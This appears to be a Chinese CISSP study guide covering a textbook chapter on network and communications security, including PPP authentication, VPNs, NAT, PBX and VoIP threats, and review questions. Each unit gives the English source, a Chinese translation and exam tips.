广域网链路或长距离连接技术可分为两类:专用线路和非专用线路。 专用线路 连接两个特定的端点,且仅连接这两个端点。 非专用线路则需要在数据传输前 先建立连接。 通信系统容易受到多种攻击,包括分布式拒绝服务(DDoS)、窃听、伪装、 重放、篡改、欺骗以及ARP和DNS攻击。 幸运的是,针对这些攻击都存在有 效的应对措施。 学习要点

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

检测是 IDS,主动阻断更像 IPS。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 69 / PDF P906

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Understand PPP. Point-to-Point Protocol (PPP) is an encapsulation protocol designed to support the transmission of IP traffic over dial-up or point-to-point links. The original PPP options for authentication were PAP, CHAP, and EAP. Define PAP, CHAP, and EAP. Password Authentication Protocol (PAP) transmits usernames and passwords in cleartext. Challenge Handshake Authentication Protocol (CHAP) performs authentication using a challengeresponse dialogue that cannot be replayed. Extensible Authentication Protocol (EAP) allows customized authentication security solutions. Understand IEEE 802.1X.

IEEE 802.1X defines the use of encapsulated EAP to support a wide range of authentication options for LAN connections. The IEEE 802.1X standard is formally named “Port-Based Network Access Control.” Know about port security. Port security can mean the physical control of all connection points, such as RJ-45 wall jacks or device ports. Port security is the management of TCP and User Datagram Protocol (UDP) ports. Port security can also refer to the need to authenticate to a port before being allowed to communicate through or across the port (i.e., IEEE 802.1X). Understand voice communications security.

Voice communications are vulnerable to many attacks, especially as voice communications become an important part of network services. You can obtain confidentiality by using encrypted communications. Countermeasures must be deployed to protect against interception, eavesdropping, tapping, and other types of exploitation. Know the threats associated with PBX systems and the countermeasures to PBX fraud. Countermeasures to PBX fraud and abuse include many of the same precautions you would employ to protect a typical computer network: logical or technical controls, administrative controls, and physical controls. Understand the security issues related to VoIP.

VoIP is at risk for caller ID spoofing, vishing, call manager software/firmware attacks, phone hardware attacks, DoS, AitM/MitM/on-path attacks, spoofing, and switch hopping. Recognize what phreaking is. Phreaking is a specific type of attack in which various types of technology are used to circumvent the telephone system to make free long-distance calls, to alter the function of telephone

中文直译 / 整理

了解PPP。 点对点协议(PPP)是一种封装协议,旨在支持通过拨号或点对点 链路传输IP流量。 原始的PPP认证选项包括PAP、CHAP和EAP。 定义PAP、CHAP和EAP。 密码认证协议(PAP)以明文形式传输用户名和密 码。 挑战握手认证协议(CHAP)通过无法重放的挑战‑响应对话进行身份验证。 可扩展认证协议(EAP)允许自定义的身份验证安全解决方案。 理解IEEE 802.1X。 IEEE 802.1X定义了使用封装的EAP来支持局域网连接的多 种认证选项。 IEEE 802.1X标准的正式名称为“基于端口的网络访问控制”。 了解端口安全。 端口安全可以指对所有连接点(如RJ‑45墙插或设备端口)的物 理控制。 端口安全也指对TCP和用户数据报协议(UDP)端口的管理。 端口安 全还可指在允许通过或跨端口通信之前,必须对端口进行身份验证(即IEEE 802.1X)。 理解语音通信安全。 语音通信容易受到多种攻击,尤其是当语音通信成为网络服 务的重要组成部分时。 您可以通过使用加密通信来实现机密性。 必须部署对策以 防止拦截、窃听、窃听和其他类型的利用。 了解与PBX系统相关的威胁以及 针对PBX欺诈的应对措施。

针对PBX欺诈和滥用的应对措施包括许多用于保 护典型计算机网络的相同预防措施:逻辑或技术控制、管理控制和物理控制。 了解与VoIP相关的安全问题。 VoIP面临来电显示伪造、语音钓鱼、呼叫管 理软件/固件攻击、电话硬件攻击、拒绝服务攻击、中间人/在线攻击、伪造和 交换机跳转等风险。 了解什么是电话窃听。 电话窃听是一种特定类型的攻击,利用各种技术绕过 电话系统,以免费拨打长途电话、更改电话功能

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 70 / PDF P907

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

service, to steal specialized services, or to cause service disruptions. A phreaker is an attacker who performs phreaking. Understand the issues of remote access security management. Remote access security management requires that security system designers address the hardware and software components of an implementation along with issues related to policy, work tasks, and encryption. Know various issues related to remote access security. Be familiar with remote access, dial-up connections, screen scrapers, virtual applications/desktops, and general telecommuting security concerns. Understand multimedia collaboration.

Multimedia collaboration is the use of various multimedia-supporting communication solutions to enhance distance collaboration and communications. Know the purpose of load balancers. The purpose of load balancing is to obtain more optimal infrastructure utilization, minimize response time, maximize throughput, reduce overloading, and eliminate bottlenecks. A load balancer is used to spread or distribute network traffic load across several network links or network devices. Understand active/active. An active-active system is a form of load balancing that uses all available pathways or systems during normal operations but that has reduced capacity in adverse conditions.

Understand active/passive. An active-passive system is a form of load balancing that keeps some pathways or systems in an unused dormant state during normal operations. It is able to maintain consistent capacity during abnormal conditions. Understand virtualized networks. A virtualized network or network virtualization is the combination of hardware and software networking components into a single integrated entity. Examples include softwaredefined networks (SDNs), VLANs, VPNs, virtual switches, virtual SANs, guest operating systems, port isolation, and NAT. Define tunneling. Tunneling is the encapsulation of a protocoldeliverable message within a second protocol.

The second protocol often performs encryption to protect the message contents. Understand VPNs. VPNs are based on encrypted tunneling. They can offer authentication and data protection as a point-to-point solution. Common VPN protocols are PPTP, L2TP, SSH, TLS, and IPSec.

中文直译 / 整理

服务、窃取专用服务或造成服务中断。 进行电话窃听的攻击者称为电话窃 听者。 理解远程访问安全管理的问题。 远程访问安全管理要求安全系统设计者同时解 决实现中的硬件和软件组件,以及与策略、工作任务和加密相关的问题。 了解与远程访问安全相关的各种问题。 熟悉远程访问、拨号连接、屏幕抓取工 具、虚拟应用程序/桌面以及远程办公的一般安全问题。 理解多媒体协作。 多媒体协作是利用各种支持多媒体的通信解决方案来增强 远程协作与沟通。 了解负载均衡器的目的。 负载均衡的目的是实现更优的基础设施利用率、最小 化响应时间、最大化吞吐量、减少过载并消除瓶颈。 负载均衡器用于在多个网 络链路或网络设备之间分散或分配网络流量负载。 理解主动/主动模式。 主动/主动系统是一种负载均衡形式,在正常操作中使 用所有可用路径或系统,但在不利条件下容量会降低。 理解主动/被动模式。 主动/被动系统是一种负载均衡形式,在正常操作期间将 某些路径或系统保持在未使用的休眠状态。 它在异常条件下能够保持一致的容 量。 理解虚拟化网络。 虚拟化网络或网络虚拟化是将硬件和软件网络组件整合为一 个统一实体的过程。

示例包括软件定义网络(SDNs)、VLAN、VPN、虚拟 交换机、虚拟SAN、客户操作系统、端口隔离和NAT。 定义隧道技术。 隧道技术是将一种协议可传递的消息封装在第二种协议中 的过程。 第二种协议通常执行加密以保护消息内容。 了解VPN。 VPN基于加密隧道技术,可作为点对点解决方案提供身份验证 和数据保护。 常见的VPN协议包括PPTP、L2TP、SSH、TLS和IPSec。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
身份 身份是主体在系统中的标识。
学习单元 71 / PDF P908

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

Understand split vs. full tunnel. A split tunnel is a VPN configuration that allows a VPN-connected client system (i.e., remote node) to access both the organizational network over the VPN and the Internet directly at the same time. A full tunnel is a VPN configuration in which all of the client's traffic is sent to the organizational network over the VPN link, and then any Internetdestined traffic is routed out of the organizational network's proxy or firewall interface to the Internet. Be able to explain NAT.

NAT protects the addressing scheme of a private network, allows the use of the private IP addresses, and enables multiple internal clients to obtain Internet access through a few public IP addresses. NAT is supported by many security border devices, such as firewalls, routers, gateways, WAPs, and proxies. Know about third-party connectivity. Most organizations interact with outside third-party providers. Most of these external entities do not need to interact directly with an organization's IT/IS. However, for those few that do, it is important to consider the risks and ramifications. This includes partnerships, cloud services, and remote workers.

Understand the difference between packet switching and circuit switching. In circuit switching, a dedicated physical pathway is created between the two communicating parties. Packet switching occurs when the message or communication is broken up into small segments and sent across the intermediary networks to the destination. Within packet-switching systems are two types of communication paths, or virtual circuits: permanent virtual circuits (PVCs) and switched virtual circuits (SVCs). Understand the various network attacks and countermeasures associated with communications security.

Communication systems are vulnerable to many attacks, including distributed denial-of-service (DDoS), eavesdropping, impersonation, replay, modification, spoofing, and ARP and DNS attacks. Be able to supply effective countermeasures for each. Written Lab 1. Describe the differences between transport mode and tunnel mode of VPNs. 2. Discuss the benefits of NAT.

中文直译 / 整理

了解分隧道与全隧道。 分隧道是一种VPN配置,允许通过VPN连接的客户端系 统(即远程节点)同时通过VPN访问组织网络并直接访问互联网。 全隧道是一种 VPN配置,其中客户端的所有流量都通过VPN链路发送到组织网络,然后任何面 向互联网的流量通过组织网络的代理或防火墙接口路由到互联网。 能够解释NAT。 NAT保护私有网络的寻址方案,允许使用私有IP地址,并使多 个内部客户端能够通过少量公有IP地址访问互联网。 NAT被许多安全边界设备 支持,例如防火墙、路由器、网关、WAP和代理。 了解第三方连接。 大多数组织与外部第三方提供商互动。 这些外部实体中的大多 数无需直接与组织的IT/IS系统交互。 然而,对于少数需要直接交互的实体,考 虑其风险和影响至关重要。 这包括合作伙伴关系、云服务和远程工作者。 理解分组交换与电路交换的区别。 在电路交换中,会在两个通信方之间建立一条 专用的物理路径。 分组交换则发生在消息或通信被拆分为小段,并通过中间网络 发送到目的地时。 在分组交换系统中,存在两种通信路径或虚拟电路:永久虚拟 电路(PVC)和交换虚拟电路(SVC)。 理解与通信安全相关的各种网络攻击及应对措施。

通信系统易受多种攻击,包 括分布式拒绝服务(DDoS)、窃听、冒充、重放、篡改、欺骗以及ARP和 DNS攻击。 能够为每种攻击提供有效的应对措施。 书面实验 1. 描述传输模式和隧道模式之间的区别 VPN。 2. 讨论NAT的好处。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

安全边界:安全边界是不同信任级别或安全要求交接的位置。

防火墙:防火墙根据规则控制网络流量进出。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

IPS 放在线路中,误报可能影响可用性。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
安全边界 安全边界是不同信任级别或安全要求交接的位置。
防火墙 防火墙根据规则控制网络流量进出。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 72 / PDF P909

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

3. What are the main differences between circuit switching and packet switching? 4. What are some security issues with email and options for safeguarding against them? 5. What are the private IP addresses, APIPA addresses, and loopback addresses? 6. Name at least six facts about VLANs. Review Questions 1. Among the many aspects of a security solution, the most important is whether it addresses a specific need (i.e., a threat) for your assets. But there are many other aspects of security you should consider as well. A significant benefit of a security control is when it goes unnoticed by users. What is this called? A. Invisibility B. Transparency C. Diversion D. Hiding in plain sight 2.

Extensible Authentication Protocol (EAP) is one of the three authentication options provided by Point-to-Point Protocol (PPP). EAP allows customized authentication security solutions. Which of the following are examples of actual EAP methods? (Choose all that apply.) A. LEAP B. EAP-VPN C. PEAP D. EAP-SIM E. EAP-FAST F. EAP-MBL G. EAP-MD5 H. VEAP 3.

中文直译 / 整理

电路交换和分组交换的主要区别是什么? 4. 电子邮件存在哪些安全问题,以及如何防范这些问题? 5. 私有IP地址、APIPA地址和环回地址分别是什么? 6. 列出至少六条关于VLAN的事实。 复习题 1. 在安全解决方案的诸多方面中,最重要的是它是否解决了您资产的特定 需求(即威胁)。 但您还应考虑安全的其他许多方面。 安全控制的一个重 要优势是用户几乎察觉不到它的存在。 这被称为什么? A. 隐形 B. 透明 C. 转移注意力 D. 大庭广众之下隐藏 2. 可扩展认证协议(EAP)是点对点协议(PPP)提供的三种认证选项之 一。 EAP 允许自定义认证安全解决方案。 以下哪些是实际的 EAP 方法? (选择所有适用的选项。 ) A. LEAP B. EAP‑VPN C. PEAP D. EAP‑SIM E. EAP‑FAST F. EAP‑MBL G. EAP‑MD5 H. VEAP

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 73 / PDF P910

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

I. EAP-POTP J. EAP-TLS K. EAP-TTLS 3. In addition to maintaining an updated system and controlling physical access, which of the following is the most effective countermeasure against PBX fraud and abuse? A. Encrypting communications B. Changing default passwords C. Using transmission logs D. Taping and archiving all conversations 4. A phreaker has been apprehended who had been exploiting the technology deployed in your office building. Several handcrafted tools and electronics were taken in as evidence that the phreaker had in their possession when they were arrested. What was this adversary likely focusing on with their attempts to compromise the organization? A. Accounting B. NAT C.

PBX D. Wi-Fi 5. Multimedia collaboration is the use of various multimedia-supporting communication solutions to enhance distance collaboration (people working on a project together remotely). Often, collaboration allows workers to work simultaneously as well as across different time frames. Which of the following are important security mechanisms to impose on multimedia collaboration tools? (Choose all that apply.) A. Encryption of communications B. Multifactor authentication C. Customization of avatars and filters D. Logging of events and activities 6. Michael is configuring a new web server to offer instruction manuals and specification sheets to customers.

The web server has been positioned in the screened subnet and assigned an IP address of 172.31.201.17, and the I. EAP‑POTP J. EAP‑TLS K. EAP‑TTLS 3.

中文直译 / 整理

除了保持系统更新和控制物理访问外,以下哪项是对PBX欺诈和滥用最 有效的防范措施? A. 加密通信 B. 更改默认密码 C. 使用传输日志 D. 录制并归档所有对话 4. 一名电话窃听者已被抓获,此人曾利用贵办公楼部署的技术进行攻击。 在逮捕时,警方缴获了该窃听者持有的多种手工制作的工具和电子设备。 该攻击者试图入侵组织时,可能主要针对的是什么? A. 会计 B. NAT C. PBX D. Wi‑Fi 5. 多媒体协作是使用各种支持多媒体的通信解决方案来增强远程协作(人们 远程共同参与项目)。 通常,协作允许工作人员同时工作,也可以跨越不同 的时间框架。 以下哪项是多媒体协作工具应实施的重要安全机制? (选择所 有适用项。 ) A. 通信加密 B. 多因素身份验证 C. 头像和滤镜的自定义 D. 事件和活动的日志记录 6. Michael 正在配置一台新的 Web 服务器,以向客户提供操作手册和规格说明书。 该 Web 服务器已部署在隔离子网中,并分配了 IP 地址 172.31.201.17,且该

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

网络题先定位层次,再判断协议、设备或攻击位置。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 74 / PDF P911

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

public side of the company's split-DNS has associated the documents.myexamplecompany.com domain name with the assigned IP. After verifying that the website is accessible from his management station (which accesses the screened subnet via a jumpbox) as well as from several worker desktop systems, he declares the project completed and heads home. A few hours later, Michael thinks of a few additional modifications to perform to improve site navigation. However, when he attempts to connect to the new website using the FQDN, he receives a connection error stating that the site cannot be reached. What is the reason for this issue? A. The jumpbox was not rebooted. B.

Split-DNS does not support Internet domain name resolution. C. The browser is not compatible with the site's coding. D. A private IP address from RFC 1918 is assigned to the web server. 7. Mark is configuring the remote access server to receive inbound connections from remote workers. He is following a configuration checklist to ensure that the telecommuting links are compliant with company security policy. What authentication protocol offers no encryption or protection for logon credentials? A. PAP B. CHAP C. EAP D. RADIUS 8. Users have reported data loss and the inability to maintain connections throughout the workday.

You suspect that something about the network structure has changed to cause this QoS reduction. Which of the following are aspects of networking you need to investigate to track down the issue? (Choose all that apply.) A. Bandwidth B. System uptime C. Latency D. Jitter E. Application Layer protocol

中文直译 / 整理

公司分拆DNS的公共部分已关联 documents.myexamplecompany.com 域名及其分配的 IP 地址。 在确认 该网站可从其管理工作站(通过跳板机访问隔离子网)以及多个工作台系 统访问后,他宣布项目完成并回家。 几小时后,迈克尔想到一些额外的修 改,以改善网站导航。 然而,当他尝试使用 FQDN 连接到新网站时,收 到连接错误,提示无法访问该站点。 此问题的原因是什么? A. 跳板机未重启。 B. 分裂 DNS 不支持互联网域名解析。 C. 浏览器与网站的编码不兼容。 D. Web 服务器被分配了 RFC 1918 中的私有 IP 地址。 7. 马克正在配置远程访问服务器以接收来自远程员工的入站连接。 他正 在遵循配置清单,以确保远程办公链接符合公司安全策略。 哪种身份验 证协议不提供加密或登录凭证保护? A. PAP B. CHAP C. EAP D. RADIUS 8. 用户报告了数据丢失以及在工作日内无法保持连接。 您怀疑网络结构的某 些变化导致了这种QoS下降。 以下哪些是您需要调查的网络方面以追踪此问 题? (选择所有适用项。

) A. 带宽 B. 系统正常运行时间 C. 延迟 D. 抖动 E. 应用层协议

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 75 / PDF P912

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

F. Packet loss G. Interference H. Throughput I. OS versions J. Signal-to-noise ratio 9. While evaluating network traffic, you discover several addresses that you are not familiar with. Several of the addresses are in the range of addresses assigned to internal network segments. Which of the following IP addresses are private IPv4 addresses as defined by RFC 1918? (Choose all that apply.) A. 10.0.0.18 B. 169.254.1:.119 C. 172.31.8.204 D. 192.168.6.43 10. The CISO has requested a report on the potential communication partners throughout the company. There is a plan to implement VPNs between all network segments in order to improve security against eavesdropping and data manipulation.

Which of the following cannot be linked over a VPN? A. Two distant Internet-connected LANs B. Two systems on the same LAN C. A system connected to the Internet and a LAN connected to the Internet D. Two systems without an intermediary network connection 11. What networking device can be used to create digital virtual network segments that can be altered as needed by adjusting the settings internal to the device? A. Router B. Switch C. Proxy D. Firewall F.

中文直译 / 整理

数据包丢失 G. 干扰 H. 吞吐量 I. 操作系统版本 J. 信噪比 9. 在评估网络流量时,您发现了一些不熟悉的地址。 其中几个地址位于分配 给内部网络段的地址范围内。 以下哪些IP地址是RFC 1918定义的私有IPv4地 址? (选择所有适用的选项。 ) A. 10.0.0.18 B. 169.254.1:.119 C. 172.31.8.204 D. 192.168.6.43 10. 首席信息安全官(CISO)要求提供公司内潜在通信伙伴的报告。 计划在 所有网络段之间实施VPN,以增强对窃听和数据篡改的防护。 以下哪一项无 法通过VPN连接? A. 两个远程的互联网连接的局域网 B. 同一局域网上的两个系统 C. 一个连接到互联网的系统和一个连接到互联网的局域网 D. 两个没有中间网络连接的系统 11. 哪种网络设备可用于创建数字虚拟网络段,并可通过调整设备内部设置按 需更改? A. 路由器 B. 交换机 C. 代理 D. 防火墙

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

首席信息安全官:CISO 负责组织安全计划、策略、沟通和监督。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

